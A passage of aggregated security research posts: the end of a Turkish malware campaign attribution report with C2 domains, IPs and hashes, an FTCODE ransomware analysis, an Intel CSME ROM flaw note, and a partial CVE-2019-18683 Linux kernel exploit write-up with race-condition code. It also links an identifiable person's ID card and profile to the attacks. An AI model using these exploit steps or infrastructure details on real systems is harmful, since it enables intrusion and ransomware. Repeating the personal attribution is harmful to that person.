It would be hasty to take this information at face value, of course. The indicated country and the frequency of occurrence of traces of the Turkish language in the code allow us to assume that these coincidences are not accidental. And the email address contains "btech," which is a bit of a recurring theme.

The history of NS servers for the domain is interesting:

Table 2. History of NS servers for definebilimi.com
The hosts buhar.biz and qqww.eu have already been encountered in malware.

buhar.us

The history of this domain ("buhar" means "steam" in Turkish) starts on January 16, 2018, the same day as definebilimi.com.

Table 3. Information about the registrant (owner) of buhar.us
The situation is similar: most of the data looks fake, other than the email address ("buharcin" is Turkish for "steamer").

bcorp.fun

Registered on March 23, 2019. The registration country is (yet again) Turkey and the client organization is "Bcorp." Not to mention that we see "bcorp" in the name of the domain itself—a string that should look familiar by now.

husan2.ddns.net

The attacker used at least one unconventional way to handle hosting. Starting in mid-March 2019, we were able to record use of dynamic DNS servers. Such servers enable attackers to hide their IP addresses and keep their C2 alive for longer. The choice of names was somewhat predictable: a few months later we detected use of husan3.ddns.net, while husan.ddns.net was active as far back as April 2017.

bkorp.xyz

Starting in early April, the hacker registered domains with anonymization from WhoisGuard, Inc., which is located in Panama. Some examples include bkorp.xyz, prntsrcn.com, and i37-imgur.com. The NS servers used link these domains to the other malicious ones.

qqww.eu

This domain—like bcorp.fun—has the subdomain ip1. The registrant (Osbil Technology Ltd.) is supposedly located in Berlin. In reality, a company with the same name is located on the east coast of Cyprus in the city of Famagusta, in the partially recognized Turkish Republic of Northern Cyprus. The company's official site is hosted on a domain that acted as NS server for bcorp.fun from March to May 2019. We did not find any signs of compromise of the name servers. Because of the NS provider's configuration (with the provider's information replacing the client's in the registrant field) client information was hidden from public view.

  Figure 17. Information about the registrant (owner) of qqww.eu  


IP addresses

For a fuller picture, we will give IP addresses with some of the domains corresponding to them at various points in time:
  • 5.255.63.12
    • bcorp.fun
    • husan.ddns.net
    • husan2.ddns.net
    • husan3.ddns.net
    • qqww.eu
  • 192.95.3.137
    • bcorp.fun
    • bkorp.xyz
    • definebilimi.com
    • i36-imgur.com
    • i37-imgur.com
    • i38-imgur.com
    • i39-imgur.com
    • prntsrcn.com
    • qqww.eu
192.95.3.140
  • bkorp.xyz
  • buhar.us

On the trail of the hacker

Among the malicious tools and utilities found on the attacker's server, we uncovered a curious image:

  Figure 18. Image file found on the attacker's web server  




We have not reduced the image size. The image is included here with the exact same dimensions as on the server.

Despite the poor image quality, we were able to establish that this is a screenshot of a transaction page on blockr.io. This was a dead end, but we started to look for any associations with the name of the image file (IMG_JPEG-0371e4dce3c8804f1543c3f0f309cc11.jpg). We uncovered an online scan result for a file that had the same name as the image. The analyzed object was a Windows shortcut similar to the ones discussed previously. Attached was an image containing the photo ID card of a Turkish citizen. The last name on the card (Yaman) matches one found repeatedly in the domain registration records.

Figure 19. ID card found with LNK loader
Scanning of the shortcut in the online sandbox was triggered not by a user uploading a file, but by accessing the following target URL:

hxxps://github.com/btechim/prntsrcn/blob/nm46ny/IMG-0371e4dce3c8804f1543c3f0f309cc11.jpg.lnk?raw=true
The user's Github account is now blocked, but based on the URL we can deduce the user's handle (btechim) and the name of the project (prntsrcn). The project name matches the name of one of the domains used in the campaign (prntsrcn.com). The user handle contains "btech," which we saw in the software for the admin panels described already.

Searching for this same handle put us onto a freelancer hiring site. There we find a page for a freelancer in Turkey who has the same handle, along with confirmed phone number, mailing address, and Facebook profile. He is offering his services in the area of software development and cybersecurity.

  Figure 20. The suspected attacker's page on a freelancer hiring site  

Conclusions

Positive Technologies tracked this malicious campaign of Turkish origin for several months. It is rare to see a single series of attacks combining both modern techniques and modified 10-year-old tools. The attacker employed a wide range of tools of diverse purpose, platform, and sophistication to obtain total control over victim PCs. He used a wide range of techniques to hide his identity when establishing network infrastructure. But it was not possible to account for everything—and so pride and a few slipups ultimately gave away the game. The research was sent to the Turkish Information Security Incident Response Center.

Author: Aleksey Vishnyakov, Positive Technologies

IOCs

Office loaders

3305720da73efbcb7d25edbb7eff5a1a
5b6d77f3e48e7723498ede5d5ba54f26
621a0133e28edec77a2d3e75115b8655
712e7ec49ad3b8c91b326b6d5ee8dcd8
731a3d72e3d36c2270c1d0711c73c301
929374b35a73c59fe97b336d0c414389

LNK loaders

3bc5d95e2bd2d52a300da9f3036f5b3b
527069e966b4a854df35aef63f45986a
a4667e0b3bfaca0cda5c344f1475b8e0

Houdini JScript

04c2ad67de2cea3f247cf50c5e12e969
5ab9176b9ed9f7a776ec82c412a89eab
84f0d098880747f417703f251a2e0d1c
94c6ba0d812b4daf214263fffc951a20
a52509a38846b55a524019f2f1a06ade
bf2fb6cdbc9fde99e186f01ad26f959f
c871091ce44594adbd6cf4388381e410
daf6a9eb55813d1a151695d33506179d
f010af1b330d00abb5149e9defdae6ee
ff924faeb9dfd7384c05abe855566fc9

Bcorp JAR

59978b5a9e4ab36da0f31a8f616cc9d3
a7219da3b0c0730c476fe340dbf7e4e5
ddac55213089da9ef407bce05ebe653e

Get-ChromeCreds

11769e9f49123a2af00bd74453221c07
1a81c9119d7761535c198ddb761979b8
42a85849a591e65b0254d9bcbdf59f82
8e49263f33c53ee5bc91bebbf9617352
c9ab090ad2badb9862fd5b6058428096

Start-KeyLogger

55daa84475a11ea656183e0ad5ccc608
aa82fbb6a341d71d2431b6d2ebca027c

WebBrowserPassView

7722e086cf7ed59955a1d6ec26f49cf3

NetWire RAT

1470a08bd427bb8738a254ba4f130ff5
5f8495016773c7834b1c588f0997a6c4

TCP Listen

913567da98185cad9f91a570dc298de1

Script loaders

02946d10c6a34fe74826f3c0b0a6a3e0
1ad644bdba488a6e42ad76aea2c0ee54
3a2dcf36b9206a135daa73c645a3f56f
4dddd87d3cb80145c9859fd76dfef794
74c5e5be9f79bd9e7ee84fd046c14e68
78f4d5fa6c68dae4b03860b54ec6cc67

Tiny PE loaders

0f3c56018a7051aebe060454fc981f5b
1b9cefc229daddc4557cea0e3bdf4656
29e6679107bd9c72aa061371082206bb
b66b7395825b9ed656b768d4e7fe1de7
fbc606b8b04e51ddb342e29b84ac1edb

xRAT

2e9a0637478938cc3e4519aa7b4219cc
7c67c93ba243be32e5fd6a6921ceded3

Bcorp panel and builder

405c987ba1a8568e2808da2b06bc9047
c3ac8b7a7c8c0d100e3c2af8ccd11441

Bcorp C2

bcorp.fun
bkorp.xyz
buhar.us
definebilimi.com
husan.ddns.net
husan2.ddns.net
husan3.ddns.net
i36-imgur.com
i37-imgur.com
i38-imgur.com
i39-imgur.com
prntsrcn.com
qqww.eu
5.255.63.12
192.95.3.137
192.95.3.140


Fileless ransomware FTCODE now steals credentials

$
0
0
In 2013, SophosLabs announced infections by a ransomware written in PowerShell. The attack targeted users from Russia. The ransomware encrypted files and renamed them with an extension .FTCODE, whence the name of the virus. The malware arrived as spam containing an HTA file attachment. The ransom demand took the form of a text file with a message in Russian instructing the victim on how to pay the ransom and decode the files.

A few years later, in autumn 2019, new mentions of FTCODE infections appeared. Hackers ran a phishing campaign targeting recipients of PEC certified emails in Italy and other countries. Victims received emails with attachments containing macros that downloaded malicious code. Apart from encryption, the ransomware also installed JasperLoader, a Trojan downloader, on victims' computers. This Trojan can be used to distribute various types of malware. For example, there have been cases when attackers downloaded the Gootkit banking Trojan onto victims' computers.

In mid-October 2019, a new version of the ransomware appeared capable of stealing passwords and credentials from users' computers. The data is retrieved from popular browsers and mail clients installed with default parameters.

PowerShell is often used to develop malware, because the interpreter of this language is included with Windows 7 and later. PowerShell also allows running a malicious code without saving it to a file on a victim's computer. The webinar on such threats is available at the Positive Technologies website.

Payload delivery

First, attackers run the script nuove_tariffe_2020_8_af11773ee02ec47fd5291895f25948e7.vbs that launches the PowerShell interpreter.

Figure 1. Downloading payload
The interpreter receives a string with commands that download the image hxxps://static[.]nexilia[.]it/nextquotidiano/2019/01/autostrade-aumenti-tariffe-2019[.]jpg (Figure 2) and save it as tarrife.jpg in a temporary file folder.

Figure 2. Image tarrife.jpg used to distract user's attention
The image is then opened, and at the same time, the ransomware is downloaded from the Internet without being saved to disk. Unlike previous cases of infection, malware body is distributed encrypted with Base64 algorithm. To deliver the payload, attackers use domain band[.]positivelifeology[.]com (Figure 3) and mobi[.]confessyoursins[.]mobi.

Figure 3. Traffic fragment with ransomware code

Stealing user credentials

As noted already, new ransomware version has a module for stealing user credentials and passwords from popular browsers and mail clients, such as Internet Explorer, Mozilla Firefox, Chrome, Outlook, and Mozilla Thunderbird.

First, the command start chooseArch is sent to attacker's server with domain surv[.]surviveandthriveparenting[.]com with the help of an HTTP POST request.

Figure 4. 
At this stage, generated traffic usually contains a string of the type guid=temp_dddddddddd followed by commands or stolen data (Figure 5). The string contains a guid, which is unique for each ransomware sample.

Figure 5. Code used by the stiller for network exchange
Next, victim's credentials and passwords are extracted, encrypted with base64, and sent to attackers.

Figure 6. Code for transferring user credentials
Below is a fragment of traffic with stolen data sent via an HTTP POST request.

Figure 7. Stolen data
Once the stolen data is sent, the stiller sends an HTTP POST request signaling that is has completed its work.

Figure 8. Signal about successful data theft


Installation of the JasperLoader downloader

The new ransomware version downloads and installs the JasperLoader downloader (Figure 9) that can be used to distribute malware.

Figure 9. Traffic fragment with code JasperLoader
Once downloaded, JasperLoader is saved to the file C:\Users\Public\Libraries\WindowsIndexingService.vbs and added to Windows tasks as WindowsApplicationService and to the startup folder via WindowsApplicationService.lnk.

Figure 10. Installation of the downloader

Data encryption

In addition to stealing user credentials and installing the downloader, FTCODE encrypts files on a victim's computer.

The first step is to prepare the environment. The ransomware uses the file C:\Users\Public\OracleKit\quanto00.tmp to save the time of its last running. That is why attackers have to check whether the file is present in the system and when it was created. If the file is present in the system and was created 30 minutes ago or later, the process ends (Figure 11). This can be used as a vaccine.

Figure 11. Checking the period of time after the last running of the ransomware
After that, identifier is read from the file C:\Users\Public\OracleKit\w00log03.tmp or a new one is created if the file is not available.

Figure 12. Preparing victim's identifier


Figure 13. Victim's identifier
Then the ransomware generates key information needed to encrypt the files.

Figure 14. Generation of key information for encryption
As can be seen in the code, information needed to restore victim's data is sent via an HTTP POST request to the host with domain food[.]kkphd[.]com.

Figure 15. Sending key information for encryption/decryption
Therefore, if one manages to intercept traffic containing salt for file encryption, one can restore the files without paying a ransom to attackers.

Figure 16. Intercepted key information
To encrypt victims' files, the ransomware uses Rijndael algorithm in CBC mode with an initialization vector based on string BXCODE INIT and the key obtained from the password "BXCODE hack your system" and the previously generated salt.

Figure 17. Encryption function
Right before the encryption starts, a "start" signal is sent via an HTTP POST request. If a file exceeds the size limit of 40,960 bytes, the file size is reduced accordingly.  A file extension is added to the files, however, not .FTCODE as it was the case with previous ransomware versions, but the one generated previously in a random way and sent to the attackers' server as a parameter value ext.

Figure 18. Encrypted files
After that, an HTTP POST request is sent containing the signal "done" and the number of encrypted files.

Figure 19. Ransomware main code
Full list of extensions of files encrypted on victim's computer

"*.sql""*.mp4""*.7z""*.rar""*.m4a""*.wma"
"*.avi""*.wmv""*.csv""*.d3dbsp""*.zip""*.sie"
"*.sum""*.ibank""*.t13""*.t12""*.qdf""*.gdb"
"*.tax""*.pkpass""*.bc6""*.bc7""*.bkp""*.qic"
"*.bkf""*.sidn""*.sidd""*.mddata""*.itl""*.itdb"
"*.icxs""*.hvpl""*.hplg""*.hkdb""*.mdbackup""*.syncdb"
"*.gho""*.cas""*.svg""*.map""*.wmo""*.itm"
"*.sb""*.fos""*.mov""*.vdf""*.ztmp""*.sis"
"*.sid""*.ncf""*.menu""*.layout""*.dmp""*.blob"
"*.esm""*.vcf""*.vtf""*.dazip""*.fpk""*.mlx"
"*.kf""*.iwd""*.vpk""*.tor""*.psk""*.rim"
"*.w3x""*.fsh""*.ntl""*.arch00""*.lvl""*.snx"
"*.cfr""*.ff""*.vpp_pc""*.lrf""*.m2""*.mcmeta"
"*.vfs0""*.mpqge""*.kdb""*.db0""*.dba""*.rofl"
"*.hkx""*.bar""*.upk""*.das""*.iwi""*.litemod"
"*.asset""*.forge""*.ltx""*.bsa""*.apk""*.re4"
"*.sav""*.lbf""*.slm""*.bik""*.epk""*.rgss3a"
"*.pak""*.big""*wallet""*.wotreplay""*.xxx""*.desc"
"*.py""*.m3u""*.flv""*.js""*.css""*.rb"
"*.png""*.jpeg""*.txt""*.p7c""*.p7b""*.p12"
"*.pfx""*.pem""*.crt""*.cer""*.der""*.x3f"
"*.srw""*.pef""*.ptx""*.r3d""*.rw2""*.rwl"
"*.raw""*.raf""*.orf""*.nrw""*.mrwref""*.mef"
"*.erf""*.kdc""*.dcr""*.cr2""*.crw""*.bay"
"*.sr2""*.srf""*.arw""*.3fr""*.dng""*.jpe"
"*.jpg""*.cdr""*.indd""*.ai""*.eps""*.pdf"
"*.pdd""*.psd""*.dbf""*.mdf""*.wb2""*.rtf"
"*.wpd""*.dxg""*.xf""*.dwg""*.pst""*.accdb"
"*.mdb""*.pptm""*.pptx""*.ppt""*.xlk""*.xlsb"
"*.xlsm""*.xlsx""*.xls""*.wps""*.docm""*.docx"
"*.doc""*.odb""*.odc""*.odm""*.odp""*.ods"
"*.odt"

Once the files are encrypted, a text file named READ_ME_NOW.htm is created on a victim's computer. The file instruct the victim on what to do to restore the files.

Figure 20. Attacker message to a victim
Each victim receives a unique link containing  an identifier from the file C:\Users\Public\OracleKit\w00log03.tmp. If it is damaged or deleted, there is a risk of never restoring encrypted data. The link leads to the page in Tor browser with a form containing a ransom demand for decrypting the files. The initial ransom amount is 500 US dollars, but it then increases.

Figure 21. Ransom demand

End of work

Once the files are encrypted, FTCODE removes data that can be used to restore the files.

Figure 22. Removal of data

Conclusion

The malware consists of the downloader (VBS code) and payload (PowerShell code). A JPEG image is used to mask the encryption. The ransomware installs well-known downloader JasperLoader, encrypts victim's files in order to get a ransom, and steals credentials and passwords from popular browsers and mail clients.

The threat is identified by PT Network Attack Discovery (PT NAD) as FTCODE.

Also, PT NAD stores network traffic to help decrypt the ransomware victim's files.

Author: Dmitry Makarov, Positive Technologies

IOCs

6bac6d1650d79c19d2326719950017a8
bf4b8926c121c228aff646b258a4541e
band[.]positivelifeology[.]com
mobi[.]confessyoursins[.]mobi
surv[.]surviveandthriveparenting[.]com
food[.]kkphd[.]com

Intel x86 Root of Trust: loss of trust

$
0
0

https://www.shutterstock.com/image-photo/fire-burning-blazing-computer-motherboard-cpugpu-1617430696

The scenario that Intel system architects, engineers, and security specialists perhaps feared most is now a reality. A vulnerability has been found in the ROM of the Intel Converged Security and Management Engine (CSME). This vulnerability jeopardizes everything Intel has done to build the root of trust and lay a solid security foundation on the company's platforms. The problem is not only that it is impossible to fix firmware errors that are hard-coded in the Mask ROM of microprocessors and chipsets. The larger worry is that, because this vulnerability allows a compromise at the hardware level, it destroys the chain of trust for the platform as a whole.

Positive Technologies specialists have discovered an error in Intel hardware, as well as an error in Intel CSME firmware at the very early stages of the subsystem's operation, in its boot ROM. Intel CSME is responsible for initial authentication of Intel-based systems by loading and verifying all other firmware for modern platforms. For instance, Intel CSME interacts with CPU microcode to authenticate UEFI BIOS firmware using BootGuard. Intel CSME also loads and verifies the firmware of the Power Management Controller responsible for supplying power to Intel chipset components.

Even more importantly, Intel CSME is the cryptographic basis for hardware security technologies developed by Intel and used everywhere, such as DRM, fTPM, and Intel Identity Protection. In its firmware, Intel CSME implements EPID (Enhanced Privacy ID). EPID is a procedure for remote attestation of trusted systems that allows identifying individual computers unambiguously and anonymously, which has a number of uses: these include protecting digital content, securing financial transactions, and performing IoT attestation. Intel CSME firmware also implements the TPM software module, which allows storing encryption keys without needing an additional TPM chip—and many computers do not have such chips.

Intel tried to make this root of trust as secure as possible. Intel's security is designed so that even arbitrary code execution in any Intel CSME firmware module would not jeopardize the root cryptographic key (Chipset Key), but only the specific functions of that particular module. Plus, as the thinking went, any risks could be easily mitigated by changing encryption keys via the security version number (SVN) mechanism. This was demonstrated in 2017, when an arbitrary code execution vulnerability was found in the BringUP (bup) firmware module, as described in Intel SA-00086. At that time, Intel simply generated new keys by incrementing the SVN, easily preventing any compromise of EPID-based technologies.

Unfortunately, no security system is perfect. Like all security architectures, Intel's had a weakness: the boot ROM, in this case. An early-stage vulnerability in ROM enables control over reading of the Chipset Key and generation of all other encryption keys. One of these keys is for the Integrity Control Value Blob (ICVB). With this key, attackers can forge the code of any Intel CSME firmware module in a way that authenticity checks cannot detect. This is functionally equivalent to a breach of the private key for the Intel CSME firmware digital signature, but limited to a specific platform.

The EPID issue is not too bad for the time being because the Chipset Key is stored inside the platform in the One-Time Programmable (OTP) Memory, and is encrypted. To fully compromise EPID, hackers would need to extract the hardware key used to encrypt the Chipset Key, which resides in Secure Key Storage (SKS). However, this key is not platform-specific. A single key is used for an entire generation of Intel chipsets. And since the ROM vulnerability allows seizing control of code execution before the hardware key generation mechanism in the SKS is locked, and the ROM vulnerability cannot be fixed, we believe that extracting this key is only a matter of time. When this happens, utter chaos will reign. Hardware IDs will be forged, digital content will be extracted, and data from encrypted hard disks will be decrypted.

The vulnerability discovered by Positive Technologies affects the Intel CSME boot ROM on all Intel chipsets and SoCs available today other than Ice Point (Generation 10). The vulnerability allows extracting the Chipset Key and manipulating part of the hardware key and the process of its generation. However, currently it is not possible to obtain that key's hardware component (which is hard-coded in the SKS) directly. The vulnerability also sets the stage for arbitrary code execution with zero-level privileges in Intel CSME.

We will provide more technical details in a full-length white paper to be published soon. We should point out that when our specialists contacted Intel PSIRT to report the vulnerability, Intel said the company was already aware of it (CVE-2019-0090). Intel understands they cannot fix the vulnerability in the ROM of existing hardware. So they are trying to block all possible exploitation vectors. The patch for CVE-2019-0090 addresses only one potential attack vector, involving the Integrated Sensors Hub (ISH). We think there might be many ways to exploit this vulnerability in ROM. Some of them might require local access; others need physical access.
As a sneak peek, here are a few words about the vulnerability itself:


1.     The vulnerability is present in both hardware and the firmware of the boot ROM. Most of the IOMMU mechanisms of MISA (Minute IA System Agent) providing access to SRAM (static memory) of Intel CSME for external DMA agents are disabled by default. We discovered this mistake by simply reading the documentation, as unimpressive as that may sound.
2.     Intel CSME firmware in the boot ROM first initializes the page directory and starts page translation. IOMMU activates only later. Therefore, there is a period when SRAM is susceptible to external DMA writes (from DMA to CSME, not to the processor main memory), and initialized page tables for Intel CSME are already in the SRAM.
3.     MISA IOMMU parameters are reset when Intel CSME is reset. After Intel CSME is reset, it again starts execution with the boot ROM.

Therefore, any platform device capable of performing DMA to Intel CSME static memory and resetting Intel CSME (or simply waiting for Intel CSME to come out of sleep mode) can modify system tables for Intel CSME pages, thereby seizing execution flow.

Author: Mark Ermolov, Positive Technologies

CVE-2019-18683: Exploiting a Linux kernel vulnerability in the V4L2 subsystem

$
0
0

This article discloses exploitation of CVE-2019-18683, which refers to multiple five-year-old race conditions in the V4L2 subsystem of the Linux kernel. I found and fixed them at the end of 2019. I gave a talk at OffensiveCon 2020 about it (slides).

Here I'm going to describe a PoC exploit for x86_64 that gains local privilege escalation from the kernel thread context (where the userspace is not mapped), bypassing KASLR, SMEP, and SMAP on Ubuntu Server 18.04.

First of all let's watch the demo video.

Vulnerabilities

These vulnerabilities are caused by incorrect mutex locking in the vivid driver of the V4L2 subsystem (drivers/media/platform/vivid). This driver doesn't require any special hardware. It is shipped in Ubuntu, Debian, Arch Linux, SUSE Linux Enterprise, and openSUSE as a kernel module (CONFIG_VIDEO_VIVID=m).

The vivid driver emulates video4linux hardware of various types: video capture, video output, radio receivers and transmitters and a software defined radio receivers. These inputs and outputs act exactly as a real hardware device would behave. That allows to use this driver as a test input for application development without requiring special hardware. Kernel documentation describes how to use the devices created by the vivid driver.

On Ubuntu, the devices created by the vivid driver are available to normal users since Ubuntu applies the RW ACL when the user is logged in:

a13x@ubuntu_server_1804:~$ getfacl /dev/video0 getfacl: Removing leading '/' from absolute path names # file: dev/video0 # owner: root # group: video user::rw- user:a13x:rw- group::rw- mask::rw- other::---

(Un)fortunately, I don't know how to autoload the vulnerable driver, which limits the severity of these vulnerabilities. That's why the Linux kernel security team has allowed me to do full disclosure.

Bugs and fixes

I used the syzkaller fuzzer with custom modifications to the kernel source code and got a suspicious kernel crash. KASAN detected use-after-free during linked list manipulations in vid_cap_buf_queue(). Investigation of the reasons led me quite far from the memory corruption. Ultimately, I found that the same incorrect approach to locking is used in vivid_stop_generating_vid_cap(), vivid_stop_generating_vid_out(), and sdr_cap_stop_streaming(). This resulted in three similar vulnerabilities.

These functions are called with vivid_dev.mutex locked when streaming is being stopped. The functions all make the same mistake when stopping their kthreads that need to lock this mutex as well. See the example from vivid_stop_generating_vid_cap():

/* shutdown control thread */ vivid_grab_controls(dev, false); mutex_unlock(&dev->mutex); kthread_stop(dev->kthread_vid_cap); dev->kthread_vid_cap = NULL; mutex_lock(&dev->mutex);

But when this mutex is unlocked, another vb2_fop_read() can lock it instead of the kthread and manipulate the buffer queue. That creates an opportunity for use-after-free later when streaming is started again.

To fix these issues, I did the following:

1. Avoided unlocking the mutex on streaming stop. For example, see the diff for vivid_stop_generating_vid_cap():

/* shutdown control thread */ vivid_grab_controls(dev, false); - mutex_unlock(&dev->mutex); kthread_stop(dev->kthread_vid_cap); dev->kthread_vid_cap = NULL; - mutex_lock(&dev->mutex);

2. Used mutex_trylock() with schedule_timeout_uninterruptible() in the loops of the vivid kthread handlers. The vivid_thread_vid_cap() handler was changed as follows:
 
for (;;) { try_to_freeze(); if (kthread_should_stop()) break; - mutex_lock(&dev->mutex);+ if (!mutex_trylock(&dev->mutex)) {+ schedule_timeout_uninterruptible(1);+ continue;+ } ... }

If mutex is not available, the kthread will sleep one jiffy and then try again. If that happens on streaming stop, in the worst case the kthread will go to sleep several times and then hit break on another loop iteration. So, in a certain sense, stopping vivid  kthread handlers was made lockless.

Sleeping is hard

I did responsible disclosure just after I finished my PoC exploit (I was at the Linux Security Summit in Lyon at the time). I sent the description of the vulnerabilities, fixing patch, and PoC crasher to security@kernel.org.

Linus Torvalds replied in less than two hours (great!). My communication with him was excellent this time. However, it took us four versions of the patch to do the right thing just because sleeping in kernel is not so easy.

The kthread in the first version of my patch didn't sleep at all:

if (!mutex_trylock(&dev->mutex)) continue;

That solved the vulnerability but -- as Linus noticed -- also introduced a busy-loop that can cause a deadlock on a non-preemptible kernel. I tested the PoC crasher that I sent them on the kernel with CONFIG_PREEMPT_NONE=y. It managed to cause a deadlock after some time, just like Linus had said.

So I returned with a second version of the patch, in which the kthread does the following:

if (!mutex_trylock(&dev->mutex)) { schedule_timeout_interruptible(1); continue; }

I used schedule_timeout_interruptible() because it is used in other parts of vivid-kthread-cap.c. The maintainers asked to use schedule_timeout() for cleaner code because kernel threads shouldn't normally take signals. I changed it, tested the patch, and sent the third version.

But finally after my full disclosure, Linus discovered that we were wrong yet again:

I just realized that this too is wrong. It _works_, but because it doesn't actually set the task state to anything particular before scheduling, it's basically pointless. It calls the scheduler, but it won't delay anything, because the task stays runnable.
So what you presumably want to use is either "cond_resched()" (to make sure others get to run with no delay) or "schedule_timeout_uninterruptible(1)" which actually sets the process state to TASK_UNINTERRUPTIBLE.
The above works, but it's basically nonsensical.

So it was incorrect kernel API usage that worked fine by pure luck. I fixed that in the final version of the patch.

Later I prepared a patch for the mainline that adds a warning for detecting such API misuse. But Steven Rostedt described that this is a known and intended side effect. So I came back with another patch that improves the schedule_timeout() annotation and describes its behavior more explicitly. That patch is scheduled for the mainline.

It turned out that sleeping is not so easy sometimes :)

Now let's talk about exploitation.

Winning the race

As described earlier, vivid_stop_generating_vid_cap() is called upon streaming stop. It unlocks the device mutex in the hope that vivid_thread_vid_cap() running in the kthread will lock it and exit the loop. Achieving memory corruption requires winning the race against this kthread.

Please see the code of the PoC crasher. If you want to test it on a vulnerable kernel, ensure that:

  • The vivid driver is loaded.
  • /dev/video0 is the V4L2 capture device (see the kernel logs).
  • You are logged in (Ubuntu applies the RW ACL that I mentioned already).

It creates two pthreads. They are bound to separate CPUs using sched_setaffinity for better racing:

cpu_set_t single_cpu; CPU_ZERO(&single_cpu); CPU_SET(cpu_n, &single_cpu); ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu); if (ret != 0) err_exit("[-] sched_setaffinity for a single CPU");

Here is the main part where the racing happens:

for (loop = 0; loop < LOOP_N; loop++) { int fd = 0; fd = open("/dev/video0", O_RDWR); if (fd < 0) err_exit("[-] open /dev/video0"); read(fd, buf, 0xfffded); close(fd); }

vid_cap_start_streaming(), which starts streaming, is called by V4L2 during vb2_core_streamon() on first reading from the opened file descriptor.

vivid_stop_generating_vid_cap(), which stops streaming, is called by V4L2 during __vb2_queue_cancel() on release of the last reference to the file.

If another reading "wins" the race against the kthread, it calls vb2_core_qbuf(), which adds an unexpected vb2_buffer to vb2_queue.queued_list. This is how memory corruption begins.

Deceived V4L2 subsystem

Meanwhile, streaming has fully stopped. The last reference to /dev/video0 is released and the V4L2 subsystem calls vb2_core_queue_release(), which is responsible for freeing up resources. It in turn calls __vb2_queue_free(), which frees our vb2_buffer that was added to the queue when the exploit won the race.

But the driver is not aware of this and still holds the reference to the freed object. When streaming is started again on the next exploit loop, vivid driver touches the freed object that is caught by KASAN:

================================================================== BUG: KASAN: use-after-free in vid_cap_buf_queue+0x188/0x1c0 Write of size 8 at addr ffff8880798223a0 by task v4l2-crasher/300 CPU: 1 PID: 300 Comm: v4l2-crasher Tainted: G W 5.4.0-rc2+ #3 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20190727_073836-buildvm-ppc64le-16.ppc.fedoraproject.org-3.fc31 04/01/2014 Call Trace: dump_stack+0x5b/0x90 print_address_description.constprop.0+0x16/0x200 ? vid_cap_buf_queue+0x188/0x1c0 ? vid_cap_buf_queue+0x188/0x1c0 __kasan_report.cold+0x1a/0x41 ? vid_cap_buf_queue+0x188/0x1c0 kasan_report+0xe/0x20 vid_cap_buf_queue+0x188/0x1c0 vb2_start_streaming+0x222/0x460 vb2_core_streamon+0x111/0x240 __vb2_init_fileio+0x816/0xa30 __vb2_perform_fileio+0xa88/0x1120 ? kmsg_dump_rewind_nolock+0xd4/0xd4 ? vb2_thread_start+0x300/0x300 ? __mutex_lock_interruptible_slowpath+0x10/0x10 vb2_fop_read+0x249/0x3e0 v4l2_read+0x1bf/0x240 vfs_read+0xf6/0x2d0 ksys_read+0xe8/0x1c0 ? kernel_write+0x120/0x120 ? __ia32_sys_nanosleep_time32+0x1c0/0x1c0 ? do_user_addr_fault+0x433/0x8d0 do_syscall_64+0x89/0x2e0 ? prepare_exit_to_usermode+0xec/0x190 entry_SYSCALL_64_after_hwframe+0x44/0xa9 RIP: 0033:0x7f3a8ec8222d Code: c1 20 00 00 75 10 b8 00 00 00 00 0f 05 48 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 4e fc ff ff 48 89 04 24 b8 00 00 00 00 0f 05 <48> 8b 3c 24 48 89 c2 e8 97 fc ff ff 48 89 d0 48 83 c4 08 48 3d 01 RSP: 002b:00007f3a8d0d0e80 EFLAGS: 00000293 ORIG_RAX: 0000000000000000 RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f3a8ec8222d RDX: 0000000000fffded RSI: 00007f3a8d8d3000 RDI: 0000000000000003 RBP: 00007f3a8d0d0f50 R08: 0000000000000001 R09: 0000000000000026 R10: 000000000000060e R11: 0000000000000293 R12: 00007ffc8d26495e R13: 00007ffc8d26495f R14: 00007f3a8c8d1000 R15: 0000000000000003 Allocated by task 299: save_stack+0x1b/0x80 __kasan_kmalloc.constprop.0+0xc2/0xd0 __vb2_queue_alloc+0xd9/0xf20 vb2_core_reqbufs+0x569/0xb10 __vb2_init_fileio+0x359/0xa30 __vb2_perform_fileio+0xa88/0x1120 vb2_fop_read+0x249/0x3e0 v4l2_read+0x1bf/0x240 vfs_read+0xf6/0x2d0 ksys_read+0xe8/0x1c0 do_syscall_64+0x89/0x2e0 entry_SYSCALL_64_after_hwframe+0x44/0xa9 Freed by task 300: save_stack+0x1b/0x80 __kasan_slab_free+0x12c/0x170 kfree+0x90/0x240 __vb2_queue_free+0x686/0x7b0 vb2_core_reqbufs.cold+0x1d/0x8a __vb2_cleanup_fileio+0xe9/0x140 vb2_core_queue_release+0x12/0x70 _vb2_fop_release+0x20d/0x290 v4l2_release+0x295/0x330 __fput+0x245/0x780 task_work_run+0x126/0x1b0 exit_to_usermode_loop+0x102/0x120 do_syscall_64+0x234/0x2e0 entry_SYSCALL_64_after_hwframe+0x44/0xa9 The buggy address belongs to the object at ffff888079822000 which belongs to the cache kmalloc-1k of size 1024 The buggy address is located 928 bytes inside of 1024-byte region [ffff888079822000, ffff888079822400) The buggy address belongs to the page: page:ffffea0001e60800 refcount:1 mapcount:0 mapping:ffff88802dc03180 index:0xffff888079827800 compound_mapcount: 0 flags: 0x500000000010200(slab|head) raw: 0500000000010200 ffffea0001e77c00 0000000200000002 ffff88802dc03180 raw: ffff888079827800 000000008010000c 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff888079822280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff888079822300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb >ffff888079822380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ ffff888079822400: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff888079822480: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ==================================================================48>

As you can see from this report, use-after-free happens on the object from the kmalloc-1k cache. That object is relatively big, so its slab cache is not so heavily used in the kernel. That makes heap spraying more precise (good for exploitation).

Heap spraying

Heap spraying is an exploitation technique that aims to put controlled bytes at a predetermined memory location on the heap. Heap spraying usually involves allocating multiple heap objects with controlled contents and abusing some allocator behavior pattern.

Heap spraying for exploiting use-after-free in the Linux kernel relies on the fact that on kmalloc(), the slab allocator returns the address to the memory that was recently freed (for better performance). Allocating a kernel object with the same size and controlled contents allows overwriting the vulnerable freed object:



